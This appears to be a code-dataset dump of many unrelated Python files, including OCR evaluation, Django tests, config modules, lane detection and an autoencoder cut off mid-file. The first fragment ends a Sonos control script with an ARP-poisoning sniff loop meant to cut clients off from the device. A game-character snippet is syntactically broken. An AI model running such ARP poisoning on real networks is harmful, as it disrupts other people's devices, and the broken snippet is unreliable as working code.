elif arguments.action == "next":
logging.debug("Play next song")
playNext(ip)
logging.info("Playing next song")
elif arguments.action == "previous":
logging.debug("Play previous song")
playPrevious(ip)
logging.info("Playing previous song")
elif arguments.action == "pause":
logging.debug("Pause music")
pauseMusic(ip)
logging.info("Paused music")
elif arguments.action == "play":
logging.debug("Play music")
playMusic(ip)
logging.info("Playing music")
# If the arp poisoning option was specified, go into an indefinite sniffing loop now
if arguments.interface:
logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
snif_interface = arguments.interface
macSelf = get_mac_address(interface=snif_interface)
ipSonos = arguments.address
# Start sniffing for arp packets
# See arpFilterAndPoison() for additional explanation
arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
| StarcoderdataPython |
8102756 | <reponame>Xowap/pylesswrap
# vim: fileencoding=utf-8 tw=100 expandtab ts=4 sw=4 :
#
# pylesswrap
# (c) 2014 <NAME> <<EMAIL>>
#
# This work is free. You can redistribute it and/or modify it under the
# terms of the Do What The Fuck You Want To Public License, Version 2,
# as published by Sam Hocevar. See the COPYING file for more details.
try:
from django.conf import settings
from django.contrib.staticfiles.finders import get_finder
from django.test import TestCase
from pylesswrap.django_finders import FileSystemFinderDirs, AppDirectoriesFinderDirs, list_dirs
class TestDjangoFinders(TestCase):
def test_file_system_finder(self):
finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
dirs = FileSystemFinderDirs(finder)
self.assertEqual(set(str(x) for x in settings.STATICFILES_DIRS), set(dirs.list_paths()))
def test_app_directory_finder(self):
finder = get_finder('django.contrib.staticfiles.finders.AppDirectoriesFinder')
dirs = AppDirectoriesFinderDirs(finder)
# This ain't no real test, whatever
self.assertTrue(len(dirs.list_paths()) > 0)
def test_list_dirs(self):
dirs = set(list_dirs())
# This ain't no real test, whatever
self.assertTrue(len(dirs) > 0)
except ImportError:
pass
| StarcoderdataPython |
11354173 | from .join import Join
from .quit import Quit
from .time import Time
from .stats import Stats
from .start import Start
from .notify import Notify
from .wins import Wins
from .top import Top
def setup(client):
client.add_cog(Join(client))
client.add_cog(Quit(client))
client.add_cog(Time(client))
client.add_cog(Stats(client))
client.add_cog(Start(client))
client.add_cog(Notify(client))
client.add_cog(Wins(client))
client.add_cog(Top(client))
| StarcoderdataPython |
3295816 | import json
from random import *
with open("data.json", "r") as myfile:
data = myfile.read()
data = json.loads(data)
items = []
def updateItems():
global items
global data
items = []
buildingIDX = 0
itemIDX = 0
while True:
items.append(data["proffesions"][buildingIDX]["items"][itemIDX])
itemIDX += 1
if itemIDX >= len(data["proffesions"][buildingIDX]["items"]):
itemIDX = 0
buildingIDX += 1
if buildingIDX >= len(data["proffesions"]):
break
updateItems()
def Bindex(building):
# this function finds the index of a building
idx = 0
while True:
if data["proffesions"][idx]["building"] != building:
idx += 1
else:
return idx
if idx >= len(data["proffesions"]):
break
def moneyCalculate(cp):
re = []
if cp<= 10:
return cp
elif cp <=
pass
def charectorGen():
charector = {}
global items
riches = randint(1, 5)
buildingIDX = randint(0, len(data["proffesions"]))
charector["building"] = data["proffesions"][buildingIDX]["building"]
charector["job"] = data["proffesions"][buildingIDX]["people"][randint(
0, len(data["proffesions"][buildingIDX]["people"]))]
money = randint(0,700)
charector["items"] = []
itemCount = 0
while True:
if itemCount < riches:
charector["items"].append(items[randint(0, len(items))])
itemCount+=1
else:
break
return charector
updateItems()
print(charectorGen())
| StarcoderdataPython |
3311249 | from argparse import ArgumentParser
import os
import json
import numpy as np
from google.protobuf import json_format
from calamari_ocr.utils import glob_all, split_all_ext
from calamari_ocr.ocr import Evaluator
from calamari_ocr.ocr.datasets import create_dataset, DataSetType, DataSetMode
from calamari_ocr.proto import CheckpointParams
from calamari_ocr.ocr.text_processing import text_processor_from_proto
def print_confusions(r, n_confusions):
# sort descending
if n_confusions != 0 and r["total_sync_errs"] > 0:
total_percent = 0
keys = sorted(r['confusion'].items(), key=lambda item: -item[1])
print("{:8s} {:8s} {:8s} {:10s}".format("GT", "PRED", "COUNT", "PERCENT"))
for i, ((gt, pred), count) in enumerate(keys):
gt_fmt = "{" + gt + "}"
pred_fmt = "{" + pred + "}"
if i == n_confusions:
break
percent = count * max(len(gt), len(pred)) / r["total_sync_errs"]
print("{:8s} {:8s} {:8d} {:10.2%}".format(gt_fmt, pred_fmt, count, percent))
total_percent += percent
print("The remaining but hidden errors make up {:.2%}".format(1.0 - total_percent))
def print_worst_lines(r, gt_samples, n_worst_lines):
if len(r["single"]) != len(gt_samples):
raise Exception("Mismatch in number of predictions and gt files")
sorted_lines = sorted(zip(r["single"], gt_samples), key=lambda a: -a[0][1])
if n_worst_lines < 0:
n_worst_lines = len(gt_samples)
if n_worst_lines > 0:
print("{:60s} {:4s} {:3s} {:3s} {}".format("GT FILE", "LEN", "ERR", "SER", "CONFUSIONS"))
for (len_gt, errs, sync_errs, confusion, gt_pred), sample in sorted_lines[:n_worst_lines]:
print("{:60s} {:4d} {:3d} {:3d} {}".format(sample['id'][-60:], len_gt, errs, sync_errs, confusion))
def write_xlsx(xlsx_file, eval_datas):
print("Writing xlsx file to {}".format(xlsx_file))
import xlsxwriter
workbook = xlsxwriter.Workbook(xlsx_file)
for eval_data in eval_datas:
prefix = eval_data["prefix"]
r = eval_data["results"]
gt_files = eval_data["gt_files"]
# all files
ws = workbook.add_worksheet("{} - per line".format(prefix))
for i, heading in enumerate(["GT FILE", "GT", "PRED", "LEN", "ERR", "CER", "REL. ERR", "SYNC ERR", "CONFUSIONS"]):
ws.write(0, i, heading)
sorted_lines = sorted(zip(r["single"], gt_files), key=lambda a: -a[0][1])
all_cs = []
for i, ((len_gt, errs, sync_errs, confusion, (gt, pred)), gt_file) in enumerate(sorted_lines):
ws.write(i + 1, 0, gt_file)
ws.write(i + 1, 1, gt.strip())
ws.write(i + 1, 2, pred.strip())
ws.write(i + 1, 3, len_gt)
ws.write(i + 1, 4, errs)
ws.write(i + 1, 5, errs / max(len(gt), len(pred)))
ws.write(i + 1, 6, errs / r["total_char_errs"] if r["total_char_errs"] > 0 else 0)
ws.write(i + 1, 7, sync_errs)
ws.write(i + 1, 8, "{}".format(confusion))
all_cs.append(errs / max(len(gt), len(pred)))
# total confusions
ws = workbook.add_worksheet("{} - global".format(prefix))
for i, heading in enumerate(["GT", "PRED", "COUNT", "PERCENT"]):
ws.write(0, i, heading)
keys = sorted(r['confusion'].items(), key=lambda item: -item[1])
for i, ((gt, pred), count) in enumerate(keys):
gt_fmt = "{" + gt + "}"
pred_fmt = "{" + pred + "}"
percent = count * max(len(gt), len(pred)) / r["total_sync_errs"]
ws.write(i + 1, 0, gt_fmt)
ws.write(i + 1, 1, pred_fmt)
ws.write(i + 1, 2, count)
ws.write(i + 1, 3, percent)
# histogram of cers
hsl = "{} - histogram".format(prefix)
ws = workbook.add_worksheet(hsl)
ws.write_row("A1", ["Class", "Count"])
hist, bin_edges = np.histogram(all_cs, bins="auto")
ws.write_column("A2", bin_edges)
ws.write_column("B2", hist)
chart = workbook.add_chart({'type': 'column'})
chart.add_series({'name': "CER hist",
'categories': "='{}'!$A$2:$A${}".format(hsl, 2 + len(bin_edges)),
'values': "='{}'!$B$2:$B${}".format(hsl, 2 + len(bin_edges))
})
chart.set_title({'name': 'CER distribution'})
chart.set_x_axis({'name': 'CER'})
chart.set_y_axis({'name': 'Amount'})
ws.insert_chart("D2", chart, {"x_offset": 25, 'y_offset': 10})
workbook.close()
def main():
parser = ArgumentParser()
parser.add_argument("--dataset", type=DataSetType.from_string, choices=list(DataSetType), default=DataSetType.FILE)
parser.add_argument("--gt", nargs="+", required=True,
help="Ground truth files (.gt.txt extension). "
"Optionally, you can pass a single json file defining all parameters.")
parser.add_argument("--pred", nargs="+", default=None,
help="Prediction files if provided. Else files with .pred.txt are expected at the same "
"location as the gt.")
parser.add_argument("--pred_dataset", type=DataSetType.from_string, choices=list(DataSetType), default=DataSetType.FILE)
parser.add_argument("--pred_ext", type=str, default=".pred.txt",
help="Extension of the predicted text files")
parser.add_argument("--n_confusions", type=int, default=10,
help="Only print n most common confusions. Defaults to 10, use -1 for all.")
parser.add_argument("--n_worst_lines", type=int, default=0,
help="Print the n worst recognized text lines with its error")
parser.add_argument("--xlsx_output", type=str,
help="Optionally write a xlsx file with the evaluation results")
parser.add_argument("--num_threads", type=int, default=1,
help="Number of threads to use for evaluation")
parser.add_argument("--non_existing_file_handling_mode", type=str, default="error",
help="How to handle non existing .pred.txt files. Possible modes: skip, empty, error. "
"'Skip' will simply skip the evaluation of that file (not counting it to errors). "
"'Empty' will handle this file as would it be empty (fully checking for errors)."
"'Error' will throw an exception if a file is not existing. This is the default behaviour.")
parser.add_argument("--skip_empty_gt", action="store_true", default=False,
help="Ignore lines of the gt that are empty.")
parser.add_argument("--no_progress_bars", action="store_true",
help="Do not show any progress bars")
parser.add_argument("--checkpoint", type=str, default=None,
help="Specify an optional checkpoint to parse the text preprocessor (for the gt txt files)")
# page xml specific args
parser.add_argument("--pagexml_gt_text_index", default=0)
parser.add_argument("--pagexml_pred_text_index", default=1)
args = parser.parse_args()
# check if loading a json file
if len(args.gt) == 1 and args.gt[0].endswith("json"):
with open(args.gt[0], 'r') as f:
json_args = json.load(f)
for key, value in json_args.items():
setattr(args, key, value)
print("Resolving files")
gt_files = sorted(glob_all(args.gt))
if args.pred:
pred_files = sorted(glob_all(args.pred))
else:
pred_files = [split_all_ext(gt)[0] + args.pred_ext for gt in gt_files]
args.pred_dataset = args.dataset
if args.non_existing_file_handling_mode.lower() == "skip":
non_existing_pred = [p for p in pred_files if not os.path.exists(p)]
for f in non_existing_pred:
idx = pred_files.index(f)
del pred_files[idx]
del gt_files[idx]
text_preproc = None
if args.checkpoint:
with open(args.checkpoint if args.checkpoint.endswith(".json") else args.checkpoint + '.json', 'r') as f:
checkpoint_params = json_format.Parse(f.read(), CheckpointParams())
text_preproc = text_processor_from_proto(checkpoint_params.model.text_preprocessor)
non_existing_as_empty = args.non_existing_file_handling_mode.lower() != "error "
gt_data_set = create_dataset(
args.dataset,
DataSetMode.EVAL,
texts=gt_files,
non_existing_as_empty=non_existing_as_empty,
args={'text_index': args.pagexml_gt_text_index},
)
pred_data_set = create_dataset(
args.pred_dataset,
DataSetMode.EVAL,
texts=pred_files,
non_existing_as_empty=non_existing_as_empty,
args={'text_index': args.pagexml_pred_text_index},
)
evaluator = Evaluator(text_preprocessor=text_preproc, skip_empty_gt=args.skip_empty_gt)
r = evaluator.run(gt_dataset=gt_data_set, pred_dataset=pred_data_set, processes=args.num_threads,
progress_bar=not args.no_progress_bars)
# TODO: More output
print("Evaluation result")
print("=================")
print("")
print("Got mean normalized label error rate of {:.2%} ({} errs, {} total chars, {} sync errs)".format(
r["avg_ler"], r["total_char_errs"], r["total_chars"], r["total_sync_errs"]))
# sort descending
print_confusions(r, args.n_confusions)
print_worst_lines(r, gt_data_set.samples(), args.n_worst_lines)
if args.xlsx_output:
write_xlsx(args.xlsx_output,
[{
"prefix": "evaluation",
"results": r,
"gt_files": gt_files,
}])
if __name__ == '__main__':
main()
| StarcoderdataPython |
11371298 | """
Animation Resource
Description:
This resource will house the requests to create and retrieve video animations.
"""
from io import BytesIO
from flask import send_file
from flask_restx import Resource, reqparse
from werkzeug.datastructures import FileStorage
from saturn.apis import api
from saturn.common import animation
parser = reqparse.RequestParser()
parser.add_argument(
'audio', location='files', type=FileStorage, required=True)
parser.add_argument(
'image', location='files', type=FileStorage, required=True)
parser.add_argument(
'title', type=str, required=False)
@api.expect(parser)
class Animate(Resource):
def post(self):
"""
Create spectrum animation provided audio and image files.
"""
args = parser.parse_args()
print(args)
# Create animation
animation.create_animation(
args["audio"], args["image"], args["title"])
return send_file(
BytesIO(open("output.mp4", "rb").read()),
as_attachment=True,
attachment_filename="animation.mp4") | StarcoderdataPython |
3203239 | <filename>tests/data/test_activate_mixin.py
import unittest
from rastervision.data import (ActivateMixin, ActivationError)
class TestActivateMixin(unittest.TestCase):
class Foo(ActivateMixin):
def __init__(self):
self.activated = False
def _activate(self):
self.activated = True
def _deactivate(self):
self.activated = False
class Bar(ActivateMixin):
def __init__(self):
self.activated = False
self.foo = TestActivateMixin.Foo()
def _activate(self):
self.activated = True
def _deactivate(self):
self.activated = False
def _subcomponents_to_activate(self):
return [self.foo]
def test_activates_and_deactivates(self):
foo = TestActivateMixin.Foo()
self.assertFalse(foo.activated)
with foo.activate():
self.assertTrue(foo.activated)
self.assertFalse(foo.activated)
def test_activated_and_deactivates_subcomponents(self):
bar = TestActivateMixin.Bar()
self.assertFalse(bar.activated)
self.assertFalse(bar.foo.activated)
with bar.activate():
self.assertTrue(bar.activated)
self.assertTrue(bar.foo.activated)
self.assertFalse(bar.activated)
self.assertFalse(bar.foo.activated)
def test_no_activate_twice(self):
bar = TestActivateMixin.Bar()
with self.assertRaises(ActivationError):
with bar.activate():
with bar.activate():
pass
self.assertFalse(bar.activated)
| StarcoderdataPython |
3445826 | N, Q = map(int, input().split())
acorns = list(map(int, input().split()))
for i in range(Q):
t, l, r = map(int, input().split())
if t == 1:
acorns[l-1:r] = list(sorted(acorns[l-1:r]))
else:
acorns[l-1:r] = list(sorted(acorns[l-1:r], reverse=True))
print(*acorns)
| StarcoderdataPython |
3312014 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from oslo_cache import core as cache
from oslo_config import cfg
from oslo_log import log
from zaqar.conf import default
from zaqar.conf import drivers
from zaqar.conf import drivers_management_store_mongodb
from zaqar.conf import drivers_management_store_redis
from zaqar.conf import drivers_management_store_sqlalchemy
from zaqar.conf import drivers_message_store_mongodb
from zaqar.conf import drivers_message_store_redis
from zaqar.conf import drivers_message_store_swift
from zaqar.conf import drivers_transport_websocket
from zaqar.conf import drivers_transport_wsgi
from zaqar.conf import notification
from zaqar.conf import pooling_catalog
from zaqar.conf import profiler
from zaqar.conf import signed_url
from zaqar.conf import storage
from zaqar.conf import transport
CONF = cfg.CONF
conf_modules = [
default,
drivers,
drivers_management_store_mongodb,
drivers_management_store_redis,
drivers_management_store_sqlalchemy,
drivers_message_store_mongodb,
drivers_message_store_redis,
drivers_message_store_swift,
drivers_transport_websocket,
drivers_transport_wsgi,
notification,
pooling_catalog,
profiler,
signed_url,
storage,
transport
]
def setup_logging():
"""Set up logging for the keystone package."""
log.setup(CONF, 'zaqar')
logging.captureWarnings(True)
def configure(conf=None):
if conf is None:
conf = CONF
for module in conf_modules:
module.register_opts(conf)
# add oslo.cache related config options
cache.configure(conf)
| StarcoderdataPython |
8123680 | <gh_stars>0
from typing import Union, Dict
from asyncpg import Record
from asyncpgsa import PG
from graphene.types import ResolveInfo
from graphql.language.ast import InlineFragment
from sqlalchemy import and_
from .base import PROJECTS_REQUIRED_FIELDS, format_project_type
from tracker.api.errors import APIException
from tracker.api.services.roles import ROLES_REQUIRED_FIELDS
from tracker.api.status_codes import StatusEnum
from tracker.db.schema import roles_table, projects_table
def check_role_requested_in_node(info: ResolveInfo) -> bool:
'''
Parses projectType node\'s field_asts and
check if current user role is requested
'''
for field in info.field_asts[0].selection_set.selections:
if isinstance(field, InlineFragment):
if field.type_condition.name.value == 'ProjectType':
for field in field.selection_set.selections:
if field.name.value == 'myRole':
return True
return False
async def get_user_project_role(
db: PG, project_id: int, user_id: int
) -> Record:
'''Get role with given user id and project id. If not raise 403'''
roles_fields = ROLES_REQUIRED_FIELDS.copy()
roles_fields[0] = roles_fields[0].label('role_id')
query = roles_table.\
select().\
with_only_columns(roles_fields).\
where(and_(
roles_table.c.user_id == user_id,
roles_table.c.project_id == project_id,
roles_table.c.is_deleted.is_(False)
))
record = await db.fetchrow(query)
if not record:
raise APIException(
'You are not a member of this project.',
status=StatusEnum.FORBIDDEN.name
)
return record
async def get_project_node(
db: PG,
info: ResolveInfo,
project_id: int,
user_id: int
) -> Union[Dict, None]:
'''
Get a project with given id.
Raise 403 if user is not member of this project
'''
query = projects_table.\
select().\
with_only_columns([
*PROJECTS_REQUIRED_FIELDS,
]).\
where(and_(
projects_table.c.id == project_id,
projects_table.c.is_deleted.is_(False)
))
project = await db.fetchrow(query)
if not project:
return None
if not check_role_requested_in_node(info):
return dict(project)
role = await get_user_project_role(db, project_id, user_id)
result = format_project_type({**project, **role})
return result
| StarcoderdataPython |
4808673 | import numpy as np
import os,sys,subprocess
from pandas import *
CSPEC='SO2 SO4 NOX HNO3 NO3 PMS1 PMS2 PMS3'.split()
# 由目錄中讀取所有concrec*.dat檔名。檔名是成分與時間的矩陣
fnames=list(subprocess.check_output('ls concrec*dat',shell=True).split(b'\n'))
fnames=[i.decode('utf8') for i in fnames if len(i)>0 ]
if len(fnames)==0:sys.exit('concrec not found')
#行數
wc=int(subprocess.check_output('cat '+fnames[0]+'|wc -l',shell=True).split(b'\n')[0])
#時間
jt=[int(fname.split('/')[-1].replace('.dat','')[-4:]) for fname in fnames if len(fname)>0]
#成分
js=[int(fname.split('/')[-1].replace('.dat','')[-6:-4]) for fname in fnames if len(fname)>0]
df=DataFrame({'hr':jt,'spec':js,'fname':fnames})
df=df.loc[df.spec>0].reset_index(drop=True)
#將所有檔案內容讀進來,存到矩陣C
C=np.zeros(shape=(max(js)+1,max(jt)+1,wc))
for i in range(len(df)):
with open(df.loc[i,'fname'],'r') as f:
tmp=[float(l.strip('\n')) for l in f]
C[df.loc[i,'spec'],df.loc[i,'hr'],:]=tmp[:]
#分列各項污染物
so4 =C[1,:,:]
hno3=C[3,:,:]
no3 =C[4,:,:]
p25 =C[5,:,:]
#計算結合銨鹽的重量,並重新計算所有PMF顆粒重量
nh4=so4*(36./96.)+no3*(18./62.)+hno3*(18./63.)
total=so4+no3+hno3+nh4+p25
#輸出結果
fnRoot=fnames[0].replace('.dat','')[:-6]+'00'
for it in range(1,max(jt)+1):
fname=fnRoot+'{:04d}'.format(it)+'.dat'
with open(fname,'w') as f:
for ic in range(wc):
f.write(str(total[it,ic])+'\n')
| StarcoderdataPython |
4837129 | """Controller for registering new objects."""
import logging
import string # noqa: F401
from typing import (Dict, Optional)
from flask import current_app
from pymongo.errors import DuplicateKeyError
from trs_filer.errors.exceptions import (
InternalServerError,
)
from trs_filer.ga4gh.trs.endpoints.utils import (
generate_id,
)
logger = logging.getLogger(__name__)
class RegisterToolClass:
"""Class to register tool classes with the service."""
def __init__(
self,
data: Dict,
id: Optional[str] = None,
) -> None:
"""Initialize tool class data.
Args:
data: Tool class metadata consistent with the `ToolClass` schema.
id: Tool class identifier. Auto-generated if not provided.
Attributes:
data: Tool metadata.
replace: Whether it is allowed to replace an existing tool. Set
to `True` if an `id` is provided, else set to `False`.
id_charset: Allowed character set or expression evaluating to
allowed character set for generating object identifiers.
id_length: Length of generated object identifiers.
meta_version_init: Initial value for tool meta version.
url_prefix: URL scheme of application. For constructing tool and
version `url` properties.
host_name: Name of application host. For constructing tool and
version `url` properties.
external_port: Port at which application is served. For
constructing tool and version `url` properties.
api_path: Base path at which API endpoints can be reached. For
constructing tool and version `url` properties.
tool_class_validation: Whether a tool is only allowed to be added
if it is associated with a pre-existing tool class; if `False`,
the tool class associated with the tool to be added is inserted
into the tool class database collection on the fly.
db_coll_tools: Database collection for storing tool objects.
db_coll_files: Database collection for storing file objects.
db_coll_classes: Database collection for storing tool class
objects.
"""
conf = current_app.config['FOCA'].endpoints
self.data = data
self.data['id'] = None if id is None else id
self.replace = True
self.id_charset = conf['tool']['id']['charset']
self.id_length = int(conf['tool']['id']['length'])
self.meta_version_init = int(conf['tool']['meta_version']['init'])
self.url_prefix = conf['service']['url_prefix']
self.host_name = conf['service']['external_host']
self.external_port = conf['service']['external_port']
self.api_path = conf['service']['api_path']
self.db_coll_classes = (
current_app.config['FOCA'].db.dbs['trsStore']
.collections['toolclasses'].client
)
def process_metadata(self) -> None:
"""Process tool class metadata."""
# evaluate character set expression or interpret literal string as set
try:
self.id_charset = eval(self.id_charset)
except Exception:
self.id_charset = ''.join(sorted(set(self.id_charset)))
def register_metadata(self) -> None:
"""Register toolClass with TRS.
Returns:
ToolClass object.
"""
self.process_metadata()
# set unique ID, dependent values and register object
i = 0
while i < 10:
i += 1
# set random ID unless ID is provided
if self.data['id'] is None:
self.replace = False
self.data['id'] = generate_id(
charset=self.id_charset,
length=self.id_length
)
if self.replace:
# replace tool class in database
result = self.db_coll_classes.replace_one(
filter={'id': self.data['id']},
replacement=self.data,
)
# verify replacement
if result.modified_count:
logger.info(
f"Replaced tool class with id '{self.data['id']}'."
)
break
# insert tool class into database
try:
self.db_coll_classes.insert_one(document=self.data)
except DuplicateKeyError:
continue
logger.info(f"Added tool class with id '{self.data['id']}'.")
break
else:
raise InternalServerError
logger.debug(
"Entry in 'toolclasses' collection: "
f"{self.db_coll_classes.find_one({'id': self.data['id']})}"
)
| StarcoderdataPython |
12821601 | # coding: utf-8
#
# Copyright (c) 2018, <NAME> <<EMAIL>>. All rights reserved.
# Licensed under BSD 2-Clause License. See LICENSE file for full license.
from pytest import mark
from advent.input import text
from advent.the_stars_align import parser, part1
test_data = """
position=< 9, 1> velocity=< 0, 2>
position=< 7, 0> velocity=<-1, 0>
position=< 3, -2> velocity=<-1, 1>
position=< 6, 10> velocity=<-2, -1>
position=< 2, -4> velocity=< 2, 2>
position=<-6, 10> velocity=< 2, -2>
position=< 1, 8> velocity=< 1, -1>
position=< 1, 7> velocity=< 1, 0>
position=<-3, 11> velocity=< 1, -2>
position=< 7, 6> velocity=<-1, -1>
position=<-2, 3> velocity=< 1, 0>
position=<-4, 3> velocity=< 2, 0>
position=<10, -3> velocity=<-1, 1>
position=< 5, 11> velocity=< 1, -2>
position=< 4, 7> velocity=< 0, -1>
position=< 8, -2> velocity=< 0, 1>
position=<15, 0> velocity=<-2, 0>
position=< 1, 6> velocity=< 1, 0>
position=< 8, 9> velocity=< 0, -1>
position=< 3, 3> velocity=<-1, 1>
position=< 0, 5> velocity=< 0, -1>
position=<-2, 2> velocity=< 2, 0>
position=< 5, -2> velocity=< 1, 2>
position=< 1, 4> velocity=< 2, 1>
position=<-2, 7> velocity=< 2, -2>
position=< 3, 6> velocity=<-1, -1>
position=< 5, 0> velocity=< 1, 0>
position=<-6, 0> velocity=< 2, 0>
position=< 5, 9> velocity=< 1, -2>
position=<14, 7> velocity=<-2, 0>
position=<-3, 6> velocity=< 2, -1>
"""
test_output = """
#...#..###
#...#...#.
#...#...#.
#####...#.
#...#...#.
#...#...#.
#...#...#.
#...#..###
"""
def test_parser():
test = list(parser(test_data))
assert test[2] == ((3, -2), (-1, 1))
assert test[0] == ((9, 1), (0, 2))
def test_part1():
assert test_output.strip() == part1(test_data)[1].strip()
def test_part2():
assert 3 == part1(test_data)[0]
@mark.slow
def test_part2_with_puzzle_input():
assert 10003 == part1(text("the_stars_align"))[0]
| StarcoderdataPython |
5184455 | import torch, os, cv2
from model.model import parsingNet
from utils.common import merge_config
from utils.dist_utils import dist_print
import torch
import scipy.special, tqdm
import numpy as np
import torchvision.transforms as transforms
from data.dataset import LaneTestDataset
from data.constant import culane_row_anchor, tusimple_row_anchor
from thop import profile, clever_format
import matplotlib.pyplot as plt
if __name__ == "__main__":
torch.backends.cudnn.benchmark = True
args, cfg = merge_config()
dist_print('start testing...')
assert cfg.backbone in ['18','34','50','101','152','50next','101next','50wide','101wide']
if cfg.dataset == 'CULane':
cls_num_per_lane = 18
elif cfg.dataset == 'Tusimple':
cls_num_per_lane = 56
else:
raise NotImplementedError
net = parsingNet(pretrained = False, backbone=cfg.backbone,cls_dim = (cfg.griding_num+1,cls_num_per_lane,4),
use_aux=False).cuda() # we dont need auxiliary segmentation in testing
state_dict = torch.load(cfg.test_model, map_location='cpu')['model']
compatible_state_dict = {}
for k, v in state_dict.items():
if 'module.' in k:
compatible_state_dict[k[7:]] = v
else:
compatible_state_dict[k] = v
net.load_state_dict(compatible_state_dict, strict=False)
net.eval()
input_test = torch.randn(64, 3, 7, 7).cuda()
macs, params, = profile(net.model, inputs=([input_test]), verbose=False)
macs, _ = clever_format([macs, params], "%.3f")
print('MACs: {}'.format(macs))
img_transforms = transforms.Compose([
transforms.Resize((288, 800)),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
if cfg.dataset == 'CULane':
splits = ['test0_normal.txt']#, 'test1_crowd.txt', 'test2_hlight.txt', 'test3_shadow.txt', 'test4_noline.txt', 'test5_arrow.txt', 'test6_curve.txt', 'test7_cross.txt', 'test8_night.txt']
datasets = [LaneTestDataset(cfg.data_root,os.path.join(cfg.data_root, 'list/test_split/'+split),img_transform = img_transforms) for split in splits]
img_w, img_h = 1640, 590
row_anchor = culane_row_anchor
elif cfg.dataset == 'Tusimple':
splits = ['test.txt']
datasets = [LaneTestDataset(cfg.data_root,os.path.join(cfg.data_root, split),img_transform = img_transforms) for split in splits]
img_w, img_h = 1280, 720
row_anchor = tusimple_row_anchor
else:
raise NotImplementedError
job_done = True
for split, dataset in zip(splits, datasets):
loader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle = False, num_workers=1)
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print(split[:-3]+'avi')
vout = cv2.VideoWriter(split[:-3]+'avi', fourcc , 30.0, (img_w, img_h))
for i, data in enumerate(tqdm.tqdm(loader)):
imgs, names = data
#img_h1=imgs.shape[0]
#img_w1=imgs.shape[1]
#imgs = imgs[,:]
#print(imgs)
#imgs = cv2.resize(imgs, (img_w, img_h), interpolation=cv2.INTER_CUBIC)
imgs = imgs.cuda()
with torch.no_grad():
out = net(imgs)
#torch.Size([1, 3, 288, 800])
print("imgs.shape",imgs.shape)
print("color",imgs[0,0,0,0],imgs[0,1,0,0],imgs[0,2,0,0] )
if not job_done :
job_done = True
torch.onnx._export(net, imgs, "./ufast_lane_det.onnx", verbose=False,
input_names=['input'],output_names=['output1'],
opset_version=12, keep_initializers_as_inputs=True, export_params=True,dynamic_axes=None)
col_sample = np.linspace(0, 800 - 1, cfg.griding_num)
col_sample_w = col_sample[1] - col_sample[0]
#4.0150
for k in range(len(out)):
print("out[",k,"].shape",out[k].shape)
out_j = out[0].data.cpu().numpy()
out_j = out_j[:, ::-1, :]
#第二个纬度 倒序
#print("out_j.shape 1",out_j.shape)
#沿着Z 轴 进行softmax ,每个数 乘以 【1~200] 代表着 图像X 定位的位置。
#比如 下标 1 ,数值0.9 ,乘以 1 = X分割区域点 1 的位置概率是 0.9
#下标100 ,数值 0.8,乘以 100 = 分割区域点 100 处,出现概率是 0.8
#车道最终预测结果取最大,类似一个长的山峰,沿着最高点,选择高处的连线
prob = scipy.special.softmax(out_j[:-1, :, :], axis=0)
idx = np.arange(200) + 1
idx = idx.reshape(-1, 1, 1)
loc = np.sum(prob * idx, axis=0)
out_j = np.argmax(out_j, axis=0)
#print("out_j.shape 2",out_j.shape,out_j)
loc[out_j == cfg.griding_num] = 0
out_j = loc
#print("out_j.shape",out_j.shape,loc)
# import pdb; pdb.set_trace()
vis = cv2.imread(os.path.join(cfg.data_root,names[0]))
#out_j (18,4) ,4 条车道,存储x 的位置[0~1],18 是Y 的序号
for i in range(out_j.shape[1]):
#10% 左侧区域开始
if np.sum(out_j[:, i] != 0) > 1:
for k in range(out_j.shape[0]):
if out_j[k, i] > 0:
img_h0 = vis.shape[0]
img_w0 = vis.shape[1]
#print("vis.shape",vis.shape)
scalex = img_w0 / 1640
scaley = img_h0 / 590
ppp = (int(out_j[k, i] * col_sample_w * img_w * scalex/ 800) - 1,
int(img_h * scaley * (row_anchor[cls_num_per_lane-1-k]/288)) - 1 )
#print("write circle",ppp)
cv2.circle(vis,ppp,2,(0,255,0),-1)
vout.write(vis)
cv2.imshow('imshow',vis)
cv2.waitKey(0)
cv2.destroyAllWindows()
vout.release() | StarcoderdataPython |
1767443 | <filename>autoencoder/Q1_Autoencoder.py
import random
import torch
import torch.nn as nn
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
N=1000
mean1=[0,0,0]
cov1=[[1,0.8,0.8],[0.8,1,0.8],[0.8,0.8,1]]
dataset = np.random.multivariate_normal(mean1, cov1, N)
dataset = (dataset-np.amin(dataset))/(np.amax(dataset)-np.amin(dataset))
indices1 = np.random.permutation(dataset.shape[0])
training_idx, test_idx = indices1[:800], indices1[800:]
training_dataset, test_dataset = dataset[training_idx,:], dataset[test_idx,:]
label_train,label_test=dataset[training_idx,:], dataset[test_idx,:]
W11,W12,W13=0.01,0.03,0.05
W21,W22,W23=0.08,0.03,0.1
W0=0.01
W00=0.20
B11,B12=0.001,0.001
B21,B22=0.009,0.001
B31,B32=0.008,0.007
B0=0.001
B00=0.003
B000=0.004
#Initial Learning Rate
lr=0.1
def sigmoidF(X):
return (1/(1+np.exp(-X)))
def sigmoidP(X):
return (sigmoidF(X)*(1-sigmoidF(X)))
DW11=DW12=DW13=DW21=DW22=DW23=DW0=DW00=DB11=DB12=DB21=DB22=DB31=DB32=DB0=DB00=DB000=0.00
train_loss_array=[]
test_loss_array=[]
for epoch in range(200):
y1=[]
y2=[]
y3=[]
for i in range(training_dataset.shape[0]):
X1=training_dataset[i][0]
X2=training_dataset[i][1]
X3=training_dataset[i][2]
a1=(X1*W11)+(X2*W12)+(X3*W13)+W0
Z1=sigmoidF(a1)
a2=(X1*W21)+(X2*W22)+(X3*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
